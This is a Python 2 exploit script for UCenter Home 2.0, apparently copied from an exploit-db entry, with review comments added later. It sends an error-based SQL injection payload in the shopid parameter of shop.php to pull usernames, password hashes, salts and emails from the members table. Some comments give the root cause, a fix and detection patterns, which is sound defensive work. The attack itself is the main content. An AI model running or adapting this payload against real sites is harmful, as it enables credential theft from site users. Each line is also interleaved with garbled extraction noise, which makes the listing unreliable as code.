$ i, n0 k4 A+ b t#!/usr/bin/env python / ?& J/ |. s# ^2 e2 O& ^# Q
\, p# E6 k3 E7 P# P' Uimport sys
7 Z3 ~- z% n" s% g& A& Ximport urllib2
( F- H% U' H9 p) ~9 G: \: ?import re # b. L" ^9 W8 j! g
# info(): prints the script's provenance (the exploit-db entry it was taken
# from and a mirror URL), the handle of the person who modified it, and the
# usage line, which takes a single "site" argument.
# NOTE(review): this listing is interleaved with extraction noise; the stray
# character runs before and after the statements are not part of the script.
# The print statements and the urllib2 import mean this is Python 2 code.
6 }$ E B5 p# r, T. ]8 fdef info():
_. k# D: P7 C0 @9 ^ print 'From:http://www.exploit-db.com/exploits/14997/' ; q) H9 u. t. ?# `" {
print 'http://www.hake.cc/Web_loudong/'
9 M! f# }/ Q1 | print 'changed:qiaoy' . P* O: X+ w* ?6 ?
print 'exp:' + ?8 G: V$ I0 ^
print ' ./UCenter_Home_2.0.py site'
# main(): proof-of-concept for an error-based SQL injection through the
# `shopid` query parameter of shop.php (UCenter Home 2.0, per the usage text).
# It sends one GET request and parses the database error echoed in the reply.
# NOTE(review): the listing is interleaved with extraction noise, so the exact
# original tokens and indentation cannot be recovered with certainty.
- E) W. `: d& O5 qdef main():
# Exactly one command-line argument (the site) is required; otherwise only
# the usage text is printed.
& N9 \9 N" z3 _$ @( z5 N9 Q9 D& B if len(sys.argv) != 2:
6 _& z3 F' f; R; E) y info()
; \% r& q6 \9 O+ N2 @* ?4 w0 F, m else: ) x; b% }3 y n9 O% i1 X
site = sys.argv[1]
# Scheme handling: a value that already starts with http:// or https:// is
# used as given; anything else gets 'http://' prepended.
# NOTE(review): the two `sitesite = site` assignments bind a name that is never
# read afterwards, so they act as no-ops; possibly a scrape artifact of
# `site = site` (confirm against the referenced original).
2 m- ? E6 \$ |# ] if site[0:7] == 'http://':
4 }1 B# a5 J, \! L9 C: Q sitesite =site 0 `: o7 C3 n; Q9 P9 w3 i4 R/ l
elif site[0:8] == 'https://':
2 u" q2 g5 o- ?7 g sitesite = site 0 M- \$ O. U% Z
else:
- K5 I" p2 n: D: |' L9 |$ V' w site = 'http://'+site
8 c0 I5 P3 l/ y) Y3 m- z- m2 J try:
# The shopid value carries a nested subquery that groups on floor(rand(0)*2)
# to force a duplicate-key error, with the first row of ucenter.uc_members
# (uid, username, password, salt, email, ':'-separated and wrapped in ~'...'~)
# concatenated into the failing key.
# Root cause (presumably): shopid reaches the SQL statement without integer
# casting or parameter binding. Fix on the application side: bind or int-cast
# the parameter and stop returning database error text to clients.
# Detection: requests to shop.php whose shopid contains `information_schema`
# or `floor(rand(`, and responses containing "Duplicate entry".
- o$ H& w8 R% k* a2 D url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'
; p' N: _9 z0 B4 z+ u5 i1 \ Value = urllib2.urlopen(url).read()
# The leaked row is recovered from the "Duplicate entry '~'...' for key" text
# in the response body, so this only works where the application echoes
# database errors to the client. [0] raises IndexError when nothing matches.
2 f7 D4 `- x3 D Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0] . M' o' i0 S( k( w& Z- _8 |6 C- P
# Fields are split on ':'; index 0 (uid) is parsed but never printed.
hacked = Msg.split(':')
; b% F5 }" g. @ print 'Name: '+hacked[1] : E- |# u3 v( ^' M( D5 D& s
print 'Passwd: '+hacked[2] 6 r* [6 V# w, P2 ?, n. `
print 'salt: '+hacked[3] ' [+ K3 p% l. y' P8 d' Q( D
print 'email: '+hacked[4]
# Bare except: network failures, a missing error string and short field lists
# all collapse into the same generic message, hiding the actual cause.
. t. ]2 R$ k8 W* }- ^ except:
- j& q( M7 p/ } u# s! N- b, k! h print 'Sorry,I can\'t work............'
# Script entry point: main() runs only when the file is executed directly.
! m9 {, M* d+ j, }, v( @& h3 j0 `if __name__ == '__main__': & {, B0 b1 }# K, G
main() |